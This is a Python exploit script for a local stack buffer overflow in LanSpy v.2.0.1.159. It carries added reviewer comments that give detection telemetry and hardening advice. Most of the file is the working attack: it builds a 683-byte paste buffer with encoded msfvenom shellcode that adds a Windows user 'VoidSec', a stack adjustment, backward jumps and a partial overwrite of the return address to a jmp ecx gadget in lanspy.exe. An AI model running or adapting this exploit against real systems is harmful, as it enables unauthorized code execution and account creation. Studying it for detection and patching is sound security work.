"""
Exploit title: LanSpy v.2.0.1.159 - Stack Buffer Overflow
Exploit Author: Paolo Stagno aka VoidSec - voidsec@voidsec.com - https://voidsec.com
Vendor Homepage: https://lizardsystems.com/
Download: https://www.exploit-db.com/apps/70a780b78ee7dbbbbc99852259f75d53-lanspy_setup_2.0.1.159.exe
Version: v.2.0.1.159
Tested on: Windows 10 Pro x64 v.1909 Build 18363.418
Category: local exploits
Platform: windows
Usage: Open the APP > click on the scan field > paste the contents from the
generated "LanSpy_v.2.0.1.159_exploit.txt" file

What the script does: it builds a fixed-length text buffer, writes it to
LanSpy_v.2.0.1.159_exploit.txt in the current directory, prints the buffer
length, and then starts lanspy.exe under Immunity Debugger from hard-coded
install paths.

Defensive notes (review):
- The trigger is local and interactive: the buffer only reaches the
  application when a user pastes it into the scan field, so any resulting code
  presumably runs with the privileges of whoever is running LanSpy.
- The embedded payload was generated as windows/adduser for an account named
  "VoidSec" (see the msfvenom comment below). Relevant telemetry is local
  account creation and group-membership change (Windows Security events 4720
  and 4732) and lanspy.exe spawning a command interpreter or net.exe
  (process-creation logging, e.g. Security event 4688).
- No fixed version is named on this page; treat v.2.0.1.159 as affected and
  check the vendor site for a later build.
"""
# NOTE(review): a shebang only takes effect on the first line of a file; placed
# here, after the docstring, it is an ordinary comment.
#!/usr/bin/python
# NOTE(review): os and struct are not used anywhere in the visible script.
import os,subprocess,struct,platform

# Output file that receives the generated buffer.
filename="LanSpy_v.2.0.1.159_exploit.txt"
# Offset, in bytes from the start of the buffer, at which the saved return
# address is overwritten.
EIP_offset = 680
# The bare string below is a no-op expression the author uses as a comment. It
# records debugger addresses for the start of the buffer and for the end of the
# part that arrives uncorrupted.
# NOTE(review): the "22 (pad+stack_adj)" figure does not match the values
# defined in this file (len(pad) + len(stack_adj) = 12 + 30 = 42); the note looks
# stale relative to the code.
""" 03F9FB48 start of our "junk" buffer 03F9FDDB end of not corruppted "junk" buffer 03F9FDDB - 03F9FB48 = 659 - 22 (pad+stack_adj) = 637 bytes for shellcode """
# Ten copies of a three-byte instruction (30 bytes total) placed directly ahead
# of the payload.
stack_adj = "\x83\xec\x78" * 10 # stack_adj; sub esp,0x78 (120*10=1200)
# BAD CHARS: \x00\x01\x02\x03\x04\x05\x06\x07\x09\x0a\x0b\x0c\x0d\x0f\x10\x11\x12\x13\x14\x1a\x1b\x1c\x1d\x1e\x1f\x2c
# msfvenom -p windows/adduser USER=VoidSec PASS=VoidSec1! -a x86 --platform windows -e x86/alpha_mixed -f python -v shellcode
# Payload size: 608 bytes
# The payload is kept as generated: 55 chunks of 11 bytes plus one of 3 bytes,
# which matches the 608-byte size stated above. The account name and password
# are fixed in the generator command, which makes the account name usable as a
# concrete indicator when hunting for use of this exact file.
shellcode =  b""
shellcode += b"\x89\xe2\xd9\xcf\xd9\x72\xf4\x5b\x53\x59\x49"
shellcode += b"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43"
shellcode += b"\x43\x43\x43\x43\x37\x51\x5a\x6a\x41\x58\x50"
shellcode += b"\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42"
shellcode += b"\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38"
shellcode += b"\x41\x42\x75\x4a\x49\x79\x6c\x48\x68\x4e\x62"
shellcode += b"\x63\x30\x75\x50\x45\x50\x71\x70\x4e\x69\x4a"
shellcode += b"\x45\x46\x51\x39\x50\x65\x34\x4e\x6b\x42\x70"
shellcode += b"\x70\x30\x4c\x4b\x62\x72\x56\x6c\x6e\x6b\x50"
shellcode += b"\x52\x36\x74\x4c\x4b\x62\x52\x66\x48\x36\x6f"
shellcode += b"\x6e\x57\x53\x7a\x54\x66\x35\x61\x59\x6f\x4c"
shellcode += b"\x6c\x47\x4c\x30\x61\x33\x4c\x57\x72\x66\x4c"
shellcode += b"\x31\x30\x79\x51\x38\x4f\x66\x6d\x35\x51\x58"
shellcode += b"\x47\x6d\x32\x38\x72\x51\x42\x63\x67\x6e\x6b"
shellcode += b"\x63\x62\x42\x30\x4e\x6b\x52\x6a\x67\x4c\x4e"
shellcode += b"\x6b\x30\x4c\x72\x31\x74\x38\x39\x73\x42\x68"
shellcode += b"\x43\x31\x7a\x71\x36\x31\x4c\x4b\x50\x59\x31"
shellcode += b"\x30\x46\x61\x58\x53\x6e\x6b\x67\x39\x65\x48"
shellcode += b"\x58\x63\x47\x4a\x67\x39\x6e\x6b\x30\x34\x6e"
shellcode += b"\x6b\x63\x31\x78\x56\x70\x31\x39\x6f\x4c\x6c"
shellcode += b"\x6f\x31\x6a\x6f\x64\x4d\x53\x31\x6a\x67\x65"
shellcode += b"\x68\x6d\x30\x61\x65\x4b\x46\x66\x63\x63\x4d"
shellcode += b"\x69\x68\x75\x6b\x71\x6d\x44\x64\x50\x75\x68"
shellcode += b"\x64\x53\x68\x6c\x4b\x42\x78\x67\x54\x33\x31"
shellcode += b"\x5a\x73\x72\x46\x4e\x6b\x46\x6c\x72\x6b\x6c"
shellcode += b"\x4b\x70\x58\x77\x6c\x63\x31\x69\x43\x4c\x4b"
shellcode += b"\x65\x54\x6c\x4b\x36\x61\x4e\x30\x4c\x49\x37"
shellcode += b"\x34\x37\x54\x56\x44\x43\x6b\x51\x4b\x63\x51"
shellcode += b"\x31\x49\x33\x6a\x52\x71\x6b\x4f\x49\x70\x51"
shellcode += b"\x4f\x63\x6f\x71\x4a\x6e\x6b\x34\x52\x68\x6b"
shellcode += b"\x4e\x6d\x61\x4d\x30\x6a\x66\x61\x4e\x6d\x4f"
shellcode += b"\x75\x68\x32\x67\x70\x75\x50\x57\x70\x32\x70"
shellcode += b"\x72\x48\x66\x51\x6e\x6b\x42\x4f\x6f\x77\x39"
shellcode += b"\x6f\x39\x45\x6d\x6b\x68\x70\x38\x35\x39\x32"
shellcode += b"\x33\x66\x53\x58\x69\x36\x5a\x35\x6f\x4d\x6f"
shellcode += b"\x6d\x49\x6f\x79\x45\x75\x6c\x44\x46\x33\x4c"
shellcode += b"\x34\x4a\x6b\x30\x79\x6b\x4d\x30\x44\x35\x67"
shellcode += b"\x75\x4d\x6b\x30\x47\x36\x73\x34\x32\x70\x6f"
shellcode += b"\x63\x5a\x57\x70\x53\x63\x4b\x4f\x78\x55\x75"
shellcode += b"\x33\x70\x6d\x42\x44\x34\x6e\x65\x35\x61\x68"
shellcode += b"\x45\x35\x65\x70\x74\x6f\x45\x33\x51\x30\x52"
shellcode += b"\x4e\x63\x55\x31\x64\x71\x30\x31\x65\x51\x63"
shellcode += b"\x45\x35\x42\x52\x37\x50\x52\x76\x62\x4f\x43"
shellcode += b"\x59\x70\x64\x42\x73\x30\x65\x43\x53\x65\x70"
shellcode += b"\x30\x56\x42\x4f\x71\x79\x55\x34\x51\x43\x73"
shellcode += b"\x55\x65\x33\x46\x51\x57\x51\x37\x50\x76\x4f"
shellcode += b"\x63\x71\x42\x64\x42\x64\x77\x50\x75\x76\x46"
shellcode += b"\x46\x37\x50\x30\x6e\x31\x75\x54\x34\x77\x50"
shellcode += b"\x50\x6c\x50\x6f\x55\x33\x61\x71\x42\x4c\x75"
shellcode += b"\x37\x32\x52\x70\x6f\x64\x35\x62\x50\x35\x70"
shellcode += b"\x72\x61\x65\x34\x50\x6d\x62\x49\x70\x6e\x43"
shellcode += b"\x59\x72\x53\x64\x34\x53\x42\x31\x71\x53\x44"
shellcode += b"\x70\x6f\x64\x32\x64\x33\x65\x70\x71\x46\x32"
shellcode += b"\x4f\x55\x39\x63\x54\x33\x63\x72\x45\x52\x43"
shellcode += b"\x55\x70\x46\x4f\x43\x71\x42\x64\x52\x64\x35"
shellcode += b"\x50\x41\x41"
# Twelve filler bytes between the payload and the two jump stubs.
pad = "A" * 12
# NOTE(review): opcode E9 is a near relative jump, so "FAR" in the author's
# comment describes the distance, not an x86 far jump.
jmp_far = "\xe9\x5c\xfd\xff\xff" # JMP FAR BACKWARDS
jmp_short = "\x41\xeb\xf6\x41" # ECX point here ; JMP SHORT BACKWARDS
# Only three bytes are written; per the author's comment the fourth byte of the
# saved address is already \x00 and is left in place.
# NOTE(review): the value is a fixed address inside lanspy.exe's own image, so it
# stays valid only while that image loads at the same base. Presumably the
# binary is not built with ASLR; confirm against the actual file. Per-process
# exploit mitigations (ASLR/DEP enforcement) are the hardening to evaluate for
# hosts that must keep this version.
eip = "\xad\x40\x40" # EIP 0x004040ad : jmp ecx | startnull {PAGE_EXECUTE_READ} [lanspy.exe] ; partial overwrite to keep \x00 (that is a null byte)
# original nSEH and SEH below are left untouched
# nSEH
# SEH
# The leading "A" run is sized so that everything before eip totals EIP_offset
# bytes (680), giving 683 bytes once the three eip bytes are appended.
# NOTE(review): stack_adj, pad, the jump stubs and eip are str literals while
# shellcode is a bytes literal, so this concatenation only evaluates under
# Python 2 string semantics.
payload = "A" * ( EIP_offset - len(stack_adj) - len(shellcode) - len(pad) - len(jmp_far) - len(jmp_short) ) + stack_adj + shellcode + pad + jmp_far + jmp_short + eip
# Write the buffer to the output file in text mode, then report its length.
f = open(filename, 'w')
f.write(payload)
f.close()
print("Wrote {} bytes".format(len(payload)))
# Choose the Immunity Debugger install path from the machine architecture
# string: names ending in "64" use the "Program Files (x86)" location.
ver = platform.machine()
if ver.endswith('64'):
    debuggercmd = "C:\\Program Files (x86)\\Immunity Inc\\Immunity Debugger\\ImmunityDebugger.exe"
else:
    debuggercmd = "C:\\Program Files\\Immunity Inc\\Immunity Debugger\\ImmunityDebugger.exe"
# Author's debugging harness: start the debugger with lanspy.exe as its target
# and an empty trailing argument. Both paths are hard-coded and the return code
# is ignored; the call raises if the debugger executable is missing.
subprocess.call([debuggercmd,"C:\\Program Files (x86)\\LizardSystems\\LanSpy\\lanspy.exe",""])